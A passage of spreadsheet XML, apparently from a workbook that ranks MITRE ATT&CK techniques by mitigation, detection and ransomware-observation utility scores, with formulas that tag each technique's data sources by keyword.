        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J143" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K143" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L143" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M143" s="37">
        <v>0</v>
      </c>
      <c r="N143" s="56">
        <v>0</v>
      </c>
      <c r="O143" s="56">
        <v>0</v>
      </c>
      <c r="P143" s="56">
        <v>0</v>
      </c>
      <c r="Q143" s="56">
        <v>1</v>
      </c>
      <c r="R143" s="57"/>
      <c r="S143" s="57"/>
      <c r="T143" s="57"/>
      <c r="U143" s="57"/>
      <c r="V143" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W143" s="37">
        <v>0</v>
      </c>
      <c r="X143" s="37">
        <v>0</v>
      </c>
      <c r="Y143" s="37">
        <v>0</v>
      </c>
      <c r="Z143" s="37">
        <v>1</v>
      </c>
      <c r="AA143" s="37">
        <v>0.01</v>
      </c>
      <c r="AB143" s="37">
        <v>0.01</v>
      </c>
      <c r="AC143" s="37"/>
      <c r="AD143" s="50" t="s">
        <v>522</v>
      </c>
      <c r="AE143" s="37" t="str" cm="1">
        <f t="array" ref="AE143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD143)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF143" s="37">
        <v>139</v>
      </c>
      <c r="AG143" s="37" t="str" cm="1">
        <f t="array" ref="AG143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH143" s="37">
        <v>139</v>
      </c>
      <c r="AI143" s="37" t="str" cm="1">
        <f t="array" ref="AI143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD143)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ143" s="37">
        <v>139</v>
      </c>
      <c r="AK143" s="37" t="str" cm="1">
        <f t="array" ref="AK143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL143" s="37">
        <v>139</v>
      </c>
      <c r="AM143" s="37" t="str" cm="1">
        <f t="array" ref="AM143">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD143)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN143" s="37">
        <v>0</v>
      </c>
      <c r="AO143" s="37"/>
      <c r="AP143" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ143" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>19.450793650793653</v>
      </c>
      <c r="AR143" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS143" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT143" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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44" spans="1:47" ht="34">
      <c r="A144" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="B144" s="37">
        <f t="shared" si="2"/>
        <v>438.20019885714288</v>
      </c>
      <c r="C144" s="37" t="s">
        <v>523</v>
      </c>
      <c r="D144" s="50" t="s">
        <v>524</v>
      </c>
      <c r="E144" s="37"/>
      <c r="F144" s="37">
        <v>5</v>
      </c>
      <c r="G144" s="37">
        <v>5</v>
      </c>
      <c r="H144" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="I144" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J144" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K144" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L144" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M144" s="37">
        <v>0.10491499999999999</v>
      </c>
      <c r="N144" s="56">
        <v>0</v>
      </c>
      <c r="O144" s="56">
        <v>0</v>
      </c>
      <c r="P144" s="56">
        <v>0</v>
      </c>
      <c r="Q144" s="56">
        <v>3</v>
      </c>
      <c r="R144" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S144" s="57">
        <v>2</v>
      </c>
      <c r="T144" s="57" t="s">
        <v>525</v>
      </c>
      <c r="U144" s="57">
        <v>15</v>
      </c>
      <c r="V144" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17619052380952382</v>
      </c>
      <c r="W144" s="37">
        <v>17</v>
      </c>
      <c r="X144" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y144" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z144" s="37">
        <v>3</v>
      </c>
      <c r="AA144" s="37">
        <v>0.03</v>
      </c>
      <c r="AB144" s="37">
        <v>0.03</v>
      </c>
      <c r="AC144" s="37"/>
      <c r="AD144" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE144" s="37" t="str" cm="1">
        <f t="array" ref="AE144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF144" s="37">
        <v>140</v>
      </c>
      <c r="AG144" s="37" t="str" cm="1">
        <f t="array" ref="AG144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD144)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH144" s="37">
        <v>140</v>
      </c>
      <c r="AI144" s="37" t="str" cm="1">
        <f t="array" ref="AI144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ144" s="37">
        <v>140</v>
      </c>
      <c r="AK144" s="37" t="str" cm="1">
        <f t="array" ref="AK144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL144" s="37">
        <v>140</v>
      </c>
      <c r="AM144" s="37" t="str" cm="1">
        <f t="array" ref="AM144">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD144)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN144" s="37">
        <v>0</v>
      </c>
      <c r="AO144" s="37">
        <v>5</v>
      </c>
      <c r="AP144" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.46666666666666667</v>
      </c>
      <c r="AQ144" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>146.06673295238096</v>
      </c>
      <c r="AR144" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS144" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT144" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU14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17.507944399092974</v>
      </c>
    </row>
    <row r="145" spans="1:47" ht="34">
      <c r="A145" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B145" s="37">
        <f t="shared" si="2"/>
        <v>204.47621738095239</v>
      </c>
      <c r="C145" s="37" t="s">
        <v>527</v>
      </c>
      <c r="D145" s="50" t="s">
        <v>524</v>
      </c>
      <c r="E145" s="37" t="s">
        <v>528</v>
      </c>
      <c r="F145" s="37">
        <v>1</v>
      </c>
      <c r="G145" s="37">
        <v>1</v>
      </c>
      <c r="H145" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I145" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J145" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K145" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L145" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M145" s="37">
        <v>0</v>
      </c>
      <c r="N145" s="56">
        <v>0</v>
      </c>
      <c r="O145" s="56">
        <v>17</v>
      </c>
      <c r="P145" s="56">
        <v>0</v>
      </c>
      <c r="Q145" s="56">
        <v>4</v>
      </c>
      <c r="R145" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S145" s="57">
        <v>2</v>
      </c>
      <c r="T145" s="57" t="s">
        <v>525</v>
      </c>
      <c r="U145" s="57">
        <v>15</v>
      </c>
      <c r="V145" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26190480952380951</v>
      </c>
      <c r="W145" s="37">
        <v>17</v>
      </c>
      <c r="X145" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y145" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z145" s="37">
        <v>21</v>
      </c>
      <c r="AA145" s="37">
        <v>0.21</v>
      </c>
      <c r="AB145" s="37">
        <v>0.21</v>
      </c>
      <c r="AC145" s="37"/>
      <c r="AD145" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE145" s="37" t="str" cm="1">
        <f t="array" ref="AE145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF145" s="37">
        <v>141</v>
      </c>
      <c r="AG145" s="37" t="str" cm="1">
        <f t="array" ref="AG145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD145)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH145" s="37">
        <v>141</v>
      </c>
      <c r="AI145" s="37" t="str" cm="1">
        <f t="array" ref="AI145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ145" s="37">
        <v>141</v>
      </c>
      <c r="AK145" s="37" t="str" cm="1">
        <f t="array" ref="AK145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL145" s="37">
        <v>141</v>
      </c>
      <c r="AM145" s="37" t="str" cm="1">
        <f t="array" ref="AM145">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD145)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN145" s="37">
        <v>0</v>
      </c>
      <c r="AO145" s="37">
        <v>2</v>
      </c>
      <c r="AP145" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ145" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.158739126984131</v>
      </c>
      <c r="AR145" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS145" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT145" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU14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3.2932732917611491</v>
      </c>
    </row>
    <row r="146" spans="1:47" ht="34">
      <c r="A146" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B146" s="37">
        <f t="shared" si="2"/>
        <v>162.57145566666668</v>
      </c>
      <c r="C146" s="37" t="s">
        <v>529</v>
      </c>
      <c r="D146" s="50" t="s">
        <v>524</v>
      </c>
      <c r="E146" s="37" t="s">
        <v>530</v>
      </c>
      <c r="F146" s="37">
        <v>1</v>
      </c>
      <c r="G146" s="37">
        <v>1</v>
      </c>
      <c r="H146" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I146" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J146" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K146" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L146" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M146" s="37">
        <v>0</v>
      </c>
      <c r="N146" s="56">
        <v>0</v>
      </c>
      <c r="O146" s="56">
        <v>3</v>
      </c>
      <c r="P146" s="56">
        <v>0</v>
      </c>
      <c r="Q146" s="56">
        <v>2</v>
      </c>
      <c r="R146" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S146" s="57">
        <v>2</v>
      </c>
      <c r="T146" s="57" t="s">
        <v>525</v>
      </c>
      <c r="U146" s="57">
        <v>15</v>
      </c>
      <c r="V146" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571433333333334</v>
      </c>
      <c r="W146" s="37">
        <v>17</v>
      </c>
      <c r="X146" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y146" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z146" s="37">
        <v>5</v>
      </c>
      <c r="AA146" s="37">
        <v>0.05</v>
      </c>
      <c r="AB146" s="37">
        <v>0.05</v>
      </c>
      <c r="AC146" s="37"/>
      <c r="AD146" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE146" s="37" t="str" cm="1">
        <f t="array" ref="AE146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF146" s="37">
        <v>142</v>
      </c>
      <c r="AG146" s="37" t="str" cm="1">
        <f t="array" ref="AG146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD146)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH146" s="37">
        <v>142</v>
      </c>
      <c r="AI146" s="37" t="str" cm="1">
        <f t="array" ref="AI146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ146" s="37">
        <v>142</v>
      </c>
      <c r="AK146" s="37" t="str" cm="1">
        <f t="array" ref="AK146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL146" s="37">
        <v>142</v>
      </c>
      <c r="AM146" s="37" t="str" cm="1">
        <f t="array" ref="AM146">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD146)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN146" s="37">
        <v>0</v>
      </c>
      <c r="AO146" s="37">
        <v>1</v>
      </c>
      <c r="AP146" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ146" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.190485222222229</v>
      </c>
      <c r="AR146" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS146" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT146" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU14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1.314059171957672</v>
      </c>
    </row>
    <row r="147" spans="1:47" ht="34">
      <c r="A147" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B147" s="37">
        <f t="shared" si="2"/>
        <v>163.714313</v>
      </c>
      <c r="C147" s="37" t="s">
        <v>531</v>
      </c>
      <c r="D147" s="50" t="s">
        <v>524</v>
      </c>
      <c r="E147" s="37" t="s">
        <v>532</v>
      </c>
      <c r="F147" s="37">
        <v>1</v>
      </c>
      <c r="G147" s="37">
        <v>1</v>
      </c>
      <c r="H147" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I147" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J147" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K147" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L147" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M147" s="37">
        <v>0</v>
      </c>
      <c r="N147" s="56">
        <v>0</v>
      </c>
      <c r="O147" s="56">
        <v>2</v>
      </c>
      <c r="P147" s="56">
        <v>2</v>
      </c>
      <c r="Q147" s="56">
        <v>1</v>
      </c>
      <c r="R147" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S147" s="57">
        <v>2</v>
      </c>
      <c r="T147" s="57" t="s">
        <v>525</v>
      </c>
      <c r="U147" s="57">
        <v>15</v>
      </c>
      <c r="V147" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571433333333334</v>
      </c>
      <c r="W147" s="37">
        <v>17</v>
      </c>
      <c r="X147" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y147" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z147" s="37">
        <v>5</v>
      </c>
      <c r="AA147" s="37">
        <v>0.05</v>
      </c>
      <c r="AB147" s="37">
        <v>0.05</v>
      </c>
      <c r="AC147" s="37"/>
      <c r="AD147" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE147" s="37" t="str" cm="1">
        <f t="array" ref="AE147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF147" s="37">
        <v>143</v>
      </c>
      <c r="AG147" s="37" t="str" cm="1">
        <f t="array" ref="AG147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD147)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH147" s="37">
        <v>143</v>
      </c>
      <c r="AI147" s="37" t="str" cm="1">
        <f t="array" ref="AI147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ147" s="37">
        <v>143</v>
      </c>
      <c r="AK147" s="37" t="str" cm="1">
        <f t="array" ref="AK147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL147" s="37">
        <v>143</v>
      </c>
      <c r="AM147" s="37" t="str" cm="1">
        <f t="array" ref="AM147">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD147)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN147" s="37">
        <v>0</v>
      </c>
      <c r="AO147" s="37">
        <v>0</v>
      </c>
      <c r="AP147" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ147" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.571437666666668</v>
      </c>
      <c r="AR147" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS147" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT147" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU14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48" spans="1:47" ht="34">
      <c r="A148" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B148" s="37">
        <f t="shared" si="2"/>
        <v>211.56658423809523</v>
      </c>
      <c r="C148" s="37" t="s">
        <v>533</v>
      </c>
      <c r="D148" s="50" t="s">
        <v>524</v>
      </c>
      <c r="E148" s="37" t="s">
        <v>534</v>
      </c>
      <c r="F148" s="37">
        <v>1</v>
      </c>
      <c r="G148" s="37">
        <v>1</v>
      </c>
      <c r="H148" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I148" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J148" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K148" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L148" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M148" s="37">
        <v>0</v>
      </c>
      <c r="N148" s="56">
        <v>0</v>
      </c>
      <c r="O148" s="56">
        <v>4</v>
      </c>
      <c r="P148" s="56">
        <v>0</v>
      </c>
      <c r="Q148" s="56">
        <v>0</v>
      </c>
      <c r="R148" s="57" t="s">
        <v>535</v>
      </c>
      <c r="S148" s="57">
        <v>8</v>
      </c>
